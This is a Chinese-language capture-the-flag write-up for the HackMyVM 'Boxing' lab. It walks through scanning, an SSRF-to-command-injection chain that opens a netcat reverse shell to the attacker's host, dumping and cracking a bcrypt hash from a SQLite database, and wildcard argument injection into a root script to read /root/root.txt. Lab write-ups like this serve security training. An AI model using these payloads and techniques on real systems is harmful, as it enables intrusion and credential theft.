[HackMyVM]靶场Boxing

难度:Medium

kali:192.168.56.104

靶机:192.168.56.143

端口扫描

┌──(root㉿kali2)-[~/Desktop]
└─# nmap 192.168.56.143
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-03 19:25 CST
Nmap scan report for staging-env.boxing.hmv (192.168.56.143)
Host is up (0.00060s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:1C:3A:D1 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

22 80两个端口

目录扫一下

┌──(root㉿kali2)-[~/Desktop]
└─#  gobuster dir -u http://192.168.56.143 -x html,txt,php,bak,zip --wordlist=/usr/share/wordlists/dirb/common.txt  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.143
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,txt,php,bak,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 279]
/.hta                 (Status: 403) [Size: 279]
/.hta.php             (Status: 403) [Size: 279]
/.hta.txt             (Status: 403) [Size: 279]
/.hta.html            (Status: 403) [Size: 279]
/.hta.zip             (Status: 403) [Size: 279]
/.hta.bak             (Status: 403) [Size: 279]
/.htaccess            (Status: 403) [Size: 279]
/.htaccess.zip        (Status: 403) [Size: 279]
/.htaccess.php        (Status: 403) [Size: 279]
/.htaccess.html       (Status: 403) [Size: 279]
/.htpasswd            (Status: 403) [Size: 279]
/.htaccess.txt        (Status: 403) [Size: 279]
/.htaccess.bak        (Status: 403) [Size: 279]
/.htpasswd.txt        (Status: 403) [Size: 279]
/.htpasswd.html       (Status: 403) [Size: 279]
/.htpasswd.bak        (Status: 403) [Size: 279]
/.htpasswd.zip        (Status: 403) [Size: 279]
/.htpasswd.php        (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/about.html           (Status: 200) [Size: 9704]
/blog.html            (Status: 200) [Size: 11165]
/class.html           (Status: 200) [Size: 12460]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.143/css/]
/feedback.php         (Status: 200) [Size: 1616]
/images               (Status: 301) [Size: 317] [--> http://192.168.56.143/images/]                                                                               
/index.html           (Status: 200) [Size: 23854]
/index.html           (Status: 200) [Size: 23854]
/js                   (Status: 301) [Size: 313] [--> http://192.168.56.143/js/]
/server-status        (Status: 403) [Size: 279]
Progress: 27684 / 27690 (99.98%)
===============================================================
Finished
===============================================================

看web界面

除了右上角的搜索没什么交互

进去之后跳转到feedback.php

这个界面有点特殊，肯定有点东西

抓包在响应包里面发现一个子域,添加到hosts

192.168.56.143 staging-env.boxing.hmv boxing.hmv

进入子域

测试发现只能输入boxing.hmv开头的url然后跳转

进入server-status

可以看到当前好像是127.0.1.1

下面还有127.0.0.1的进程

看到群里大佬发现boxing.hmv:pass@127.0.0.1:5000/?processName='apache'+-e+command可以执行命令

反弹shell,主要要url编码

//nc -c bash ip port
http://staging-env.boxing.hmv/index.php?url=boxing.hmv:pass@localhost:5000?processName='apache'%2b-e%2bnc%2b-c%2bbash%2b192.168.56.104%2b4567

┌──(root㉿kali2)-[~/Desktop]
└─# nc -lvp 4567 
listening on [any] 4567 ...
connect to [192.168.56.104] from staging-env.boxing.hmv [192.168.56.143] 59166
id
uid=33(www-data) gid=33(www-data) groupes=33(www-data)

切换到交互shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

当前目录是/opt/pidstat而不是/var/www/html

www-data@boxing:/opt/pidstat$ ls -al
ls -al
total 12
drwxr-xr-x 2 root root 4096  4 févr. 03:15 .
drwxr-xr-x 4 root root 4096  4 févr. 03:15 ..
-rw-r--r-- 1 root root 1876  4 févr. 03:15 index.php

同级还有一个sos目录

www-data@boxing:/opt/sos$ ls -al
ls -al
total 20
drwxr-xr-x 3 root root 4096  4 févr. 03:15 .
drwxr-xr-x 4 root root 4096  4 févr. 03:15 ..
-rwxr-xr-x 1 root root  298  4 févr. 03:15 incrontab.sh
drwxr-xr-x 2 root root 4096  4 févr. 17:20 logs
-rwxr-xr-x 1 root root  323  4 févr. 03:15 sos.sh

这几个可能提权的时候用到先放着

home下有个cassus用户，但是没权限进去

www-data@boxing:/home$ ls -al
ls -al
total 12
drwxr-xr-x  3 root    root    4096  4 févr. 03:15 .
drwxr-xr-x 18 root    root    4096  4 févr. 16:47 ..
drwx------  4 cassius cassius 4096  4 févr. 17:16 cassius

/var下面除了www还有一个dev

www-data@boxing:~/dev$ ls -al
ls -al
total 40
drwxr-xr-x 3 root root  4096  4 févr. 03:15 .
drwxr-xr-x 4 root root  4096  4 févr. 03:15 ..
-rw-r--r-- 1 root root 24576  4 févr. 03:15 boxing_database.db
drwxr-xr-x 2 root root  4096  4 févr. 03:15 cache
-rw-r--r-- 1 root root  1579  4 févr. 03:15 index.php

发现是个SQLite数据库

www-data@boxing:~/dev$ file boxing*
file boxing*
boxing_database.db: SQLite 3.x database, last written using SQLite version 3040001, file counter 5, database pages 6, cookie 0x4, schema 4, UTF-8, version-valid-for 5

进入看看，这个数据库第一次用，.tables可以查看表

www-data@boxing:~/dev$ sqlite3 box*
sqlite3 box*
SQLite version 3.40.1 2022-12-28 14:03:47
Enter ".help" for usage hints.
sqlite> show databases;
show databases;
Parse error: near "show": syntax errorshow databases;^--- error here
sqlite> .tables
.tables
fighters  matches   news      users   
sqlite> select * from users;
select * from users;
1|cassius|$2b$05$gPKe1EUBPZidX/j3qTDapeznU4CMfkpMd0sQhgehhhoG/pwc4OnVu

拿到cassius，hash碰撞一下，不过失败了。

用cassius生成一个字典然后爆破发现密码是Cassius!123

ssh连接拿到user 权限

cassius@boxing:~$ ls -al
total 32
drwx------ 4 cassius cassius 4096  4 févr. 17:16 .
drwxr-xr-x 3 root    root    4096  4 févr. 03:15 ..
lrwxrwxrwx 1 root    root       9  4 févr. 17:11 .bash_history -> /dev/null
-rw-r--r-- 1 cassius cassius  220  4 févr. 03:15 .bash_logout
-rw-r--r-- 1 cassius cassius 3526  4 févr. 03:15 .bashrc
drwxr-xr-x 3 cassius cassius 4096  4 févr. 17:14 .local
-rw-r--r-- 1 cassius cassius  807  4 févr. 03:15 .profile
drwx------ 2 cassius cassius 4096  4 févr. 17:16 .ssh
-rwx------ 1 cassius cassius   33  4 févr. 03:15 user.txt
cassius@boxing:~$ cat user.txt 
a2b3946358a96bb7a92f61a759a1d972

去看那两个脚本文件

//incrontab.shcassius@boxing:/opt/sos$ cat incrontab.sh 
#!/bin/bashecho '/etc/apache2/sites-available/000-default.conf IN_MODIFY systemctl restart apache2' | incrontab -
echo '/etc IN_DELETE,IN_MODIFY,IN_MOVED_FROM /bin/echo "File: $@/$# => $%" > /root/user_flag.log' | incrontab -
echo '/home/cassius/user.txt IN_ATTRIB /opt/sos/sos.sh' | incrontab -

//sos.shcassius@boxing:/opt/sos$ cat sos.sh 
#!/bin/bashlogs="/opt/sos/logs/output-logs.txt"
rm $logs
exec &>$logscd /home/cassius
file *
ss -altupn
last -a
w
ps aux
top -n 1
lsoffor user in $(cut -f1 -d: /etc/passwd); do
echo "Cron jobs for $user:"
crontab -u $user -l
donetail /var/log/syslog
sha256sum /bin/* /sbin/* /usr/bin/* /usr/sbin/*chmod 700 $logs

incrontab.sh也是定时任务，但是触发需要遵守规则

echo '/home/cassius/user.txt IN_ATTRIB /opt/sos/sos.sh' | incrontab -

当user.txt文件属性修改的时候就会触发 sos.sh这脚本

在sos.sh里面,有file *,这个在之前某一个靶机遇到过

我们可以添加一个参数-f 变成file -f filename就能输出文本内容

cassius@boxing:~$ ls                                                                   
user.txt                                                                               
cassius@boxing:~$ ls -al
total 32                                                                               
drwx------ 4 cassius cassius 4096  4 févr. 17:16 .                                     
drwxr-xr-x 3 root    root    4096  4 févr. 03:15 ..                                    
lrwxrwxrwx 1 root    root       9  4 févr. 17:11 .bash_history -> /dev/null            
-rw-r--r-- 1 cassius cassius  220  4 févr. 03:15 .bash_logout                          
-rw-r--r-- 1 cassius cassius 3526  4 févr. 03:15 .bashrc                               
drwxr-xr-x 3 cassius cassius 4096  4 févr. 17:14 .local                                
-rw-r--r-- 1 cassius cassius  807  4 févr. 03:15 .profile
drwx------ 2 cassius cassius 4096  4 févr. 17:16 .ssh
-rwx------ 1 cassius cassius   33  4 févr. 03:15 user.txt
cassius@boxing:~$ touch -- '-f'
cassius@boxing:~$ ls 
-f  user.txt
cassius@boxing:~$ ln -sv /root/root.txt root
'root' -> '/root/root.txt'
cassius@boxing:~$ ls
-f  root  user.txt

然后再开个窗口监听

cassius@boxing:/tmp$ while :;do cp /opt/sos/logs/output-logs.txt /tmp/1.txt 2>/dev/null;done

然后修改 user.txt的属性

cassius@boxing:~$ chmod 600 user.txt

另一个监听窗口下就能获得一个1.txt，里面就是/root/root.txt

cassius@boxing:/tmp$ cat 1.txt | head
19ed17ba1da85521ce659aeeb5ecd751: cannot open `19ed17ba1da85521ce659aeeb5ecd751' (No such file or directory)
user.txt: ASCII text

说实话，原理其实没搞太明白，后面继续再看吧。